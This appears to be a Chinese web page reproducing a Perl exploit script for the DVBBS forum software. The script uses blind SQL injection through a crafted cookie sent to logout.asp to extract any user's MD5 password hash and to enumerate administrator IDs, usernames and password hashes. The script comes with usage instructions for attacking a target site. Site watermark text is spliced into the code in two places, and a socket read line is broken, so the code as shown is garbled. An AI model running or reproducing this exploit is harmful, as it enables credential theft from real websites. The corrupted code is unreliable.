
获取任意用户MD5加密信息的测试程序

  获取任意用户MD5加密信息的测试程序:
  #!/usr/bin/perl
  #Codz By PsKey<PsKey@hotmail.com>
  #Exploit of DVBBS's logout.asp
  #--------------------------------------------------------------------------
  #  本脚本针对动网论坛logout.asp文件缺陷而写,可以推算出所有用户
  #  MD5加密密码;另外可以自动破解后台管理员ID、username、password
  #  脚本参照最新版本编写,若低版本出现不能用的情况,请自行修改程序
  #  脚本使用方法:
  #  1:在目标论坛以 ilikecat/catlikeme 注册一用户,并得到此用户的 userid
  #  2:再另注册一任意用户(此步不可少)
  #  3:运行脚本,按帮助输出命令参数
  #  如果是MSSQL版,请把这段糟糕的脚本扔到一边
  #--------------------------------------------------------------------------
  $|=1;
  use Socket;
  use Getopt::Std;
  getopt('hpwium');
  print "\n             ===================================================\n";
  print "                       Exploit of DVBBS's logout.asp\n";
  print "                     Codz By PsKey     \n";
  print "                       http://www.isgrey.com/ && c4st.51.net              \n";
  print "                       Thanx Envymask<130\@21cn.com>            \n";
  print "             ===================================================\n";
  &usage unless ( defined($opt_h) && defined($opt_w) && defined($opt_i) && defined($opt_m));
  $host=$opt_h;
  $port=$opt_p||80;
  $path=$opt_w;
  $userid=$opt_i;
  $user=$opt_u;
  $mode=$opt_m;
  if ($opt_m eq "p") {
  &usage unless defined($opt_u);
  print "\nPlease wait...\n\n";
  for ($j=1;$j<=16;$j++) {
  @dic1=(0..9);
  @dic2=(a..f);
  @dic=(@dic1,@dic2);
  &first;
  for ($i=0;$i<@dic;$i++) {
  print "$dic[$i]";
  $key=$pws.$dic[$i];
  $target = "ilikecat'%20and%20exists%20(select%20UserID%20from%20[user]%20where%20UserName='$user'%20and%20left(UserPassword,$j)='$key')%20and%20'1'='1";
  &second;
  if ("@in" !~ /ilikecat/)  {
  $th=$j.th;
  print "\n\/\/------------The $th word of the password is $dic[$i]";
  $pws=$pws.$dic[$i];
  last;
  }
  }
  }
  print "\n\nSuccessful,the full password of $user is $pws.\n";
  }
  elsif ($opt_m eq "b") {
  #Crack ID
  print "\n\#\#\#\#\#\#\#\#\#\#\#Start cracking admin's id...";
  &first;
  for ($i=0;$i<=50;$i++) {
  $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$i)%20and%20'1'='1";
  &second;
  if ("@in" !~ /ilikecat/)  {
  print "\n--------->>There is one admin's id $i";
  push (@id,$i);
  &first;
  }
  }
  print "\n\#\#\#\#\#\#\#\#\#\#\#End cracking admin's id...\n";
  sleep(2);
  #Crack the length of admin's username
  print "\n\#\#\#\#\#\#\#\#\#\#\#Start Cracking the length of admin's username...\n";
  for ($j=0;$j<@id;$j++) {
  print "  \|\-\>cracking username's length which id is $id[$j] ...";
  &first;
  for ($i=0;$i<=50;$i++) {
  $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20len(username)=$i%20and%20id=$id[$j])%20and%20'1'='1";
  &second;
  if ("@in" !~ /ilikecat/)  {
  print "\n--------->>The length of $id[$j] is $i";
  push (@len,$i);=版权所有  软件 下载  学院  版权所有=
  &first;
  last;
  }
  }
  }
  print "\n\#\#\#\#\#\#\#\#\#\#\#End Cracking the length of admin's username...\n";
  sleep(2);
  #Crack admin's username
  print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's username...\n";
  @dic1=(0..9);
  @dic2=(a..z);
  @dic=(@dic1,@dic2);
  for ($j=0;$j<@id;$j++) {
  $pws="";
  print "  \|\-\>cracking username which id is $id[$j] ...";
  OUTER: for ($k=1;$k<=$len[$j];$k++) {
  &first;
  USERNAME: for ($i=0;$i<@dic;$i++) {
  print "$dic[$i].";
  $key=$pws.$dic[$i];
  $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(username,$k)='$key')%20and%20'1'='1";
  &second;
  if ("@in" !~ /ilikecat/)  {
  $th=$k.th;
  print "\n--------->>The $th word of $id[$j] username is $dic[$i]";
  $pws=$pws.$dic[$i];
  last USERNAME;
  }
  if ($dic[$i] eq "z") {
  print "\ni can't crack this admin's name,maybe it is chinese.\n";
  push (@user,"\?");
  last OUTER;
  }
  }
  }
  push (@user,$pws);
  print "\n========>>The username is $pws which id is $id[$j]\n";
  }
  print "\n\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's username...\n";
  sleep(2);
  #Crack admin's password
  print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's password...\n";
  @dic1=(0..9);
  @dic2=(a..f);
  @dic=(@dic1,@dic2);
  for ($j=0;$j<@id;$j++) {
  $pws="";
  print "  \|\-\>cracking password which id is $id[$j] ...";
  for ($k=1;$k<=16;$k++) {
  &first;
  PASSWORD: for ($i=0;$i<@dic;$i++) {
  print "$dic[$i].";
  $key=$pws.$dic[$i];
  $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(password,$k)='$key')%20and%20'1'='1";
  &second;
  if ("@in" !~ /ilikecat/)  {
  $th=$k.th;
  print "\n--------->>The $th word of $id[$j] password is $dic[$i]";
  $pws=$pws.$dic[$i];
  last PASSWORD;
  }
  }
  }
  push (@pass,$pws);
  print "\n\n========>>The password is $pws which id is $id[$j]\n\n";
  }
  print "\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's password...\n\n";
  print "We got them now:\n";
  printf("%-4s %-20s %-16s\n",ID,UserName,PassWord);
  for ($i=0;$i<@id;$i++) {
  printf("%-4d %-20s %-16s\n",$id[$i],$user[$i],$pass[$i]);
  }
  }
  else {
  &usage;
  }
  sub first {
  $str="username=ilikecat&password=catlikeme&CookieDate=1";
  $len=length($str);
  $req = "GET $path/login.asp?action=chk&username=ilikecat&password=catlikeme HTTP/1.1\n".
  "Referer: http://$host$path/login.asp\n".
  "Host: $host\n".
  "Content-Length: $len\n".
  "Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show;upNum=0\n".
  "\n".
  "$str\n\n";
  print "\n.";
  sendraw($req);
  $req0 = "GET $path/index.asp HTTP/1.0\n".
  "Referer: http://$host$path/index.asp\n".
  "Host: $host\n".
  "Cookie: aspsky=userid=$userid&usercookies=0&userhidden=2&password=aac9ac496fa5ea8e&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=ilikecat; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";
  print ".\n";
  sendraw($req0);
  }
  sub second {
  $req1 = "GET $path/logout.asp HTTP/1.0\n".
  "Host: $host\n".
  "Cookie: aspsky=userid=$userid&usercookies=1&userhidden=2&username=$target; iscookies=0; BoardList=BoardID=Show; \n\n";
  print ".";
  @res = sendraw($req1);
  $req2 = "GET $path/index.asp?action=show HTTP/1.0\n".
  "Referer: http://$host$path/index.asp?action=show \n".
  "Host: $host\n".
  "Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";
  print ".";
  @in = sendraw($req2);
  }
  sub usage {
  print qq~
  Usage: $0 -h [-p ] -w -i -m [-u ]
  -h   =hostname you want to attack
  -p   =port,80 default
  -w   =the web path such as "/dvbbs"
  -i   =the userid of ilikecat
  -m   =only two choice,b and p(This option need -u)
  -u   =the user you want to crack
  Eg: 1.Crack proscenium
  $0 -h http://www.target.com/ -p 80 -w /dvbbs -i 2 -m p -u admin 
  2.Crack background
  $0 -h http://www.target.com/ -p 80 -w /dvbbs -i 2 -m b
  ~;
  exit;
  }
  sub sendraw {
  my ($req) = @_;
  my $target;
  $target = inet_aton($host) || die("inet_aton problems\n");
  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
  if(connect(S,pack "SnA4x8",2,$port,$target)){
  select(S);
  $| = 1;
  print $req;
  my @res = ;
  select(STDOUT);
  close(S);
  return @res;
  }
  else { =版权所有  软件 下载  学院  版权所有=
  die("Can't connect...\n");
  }
  }
 

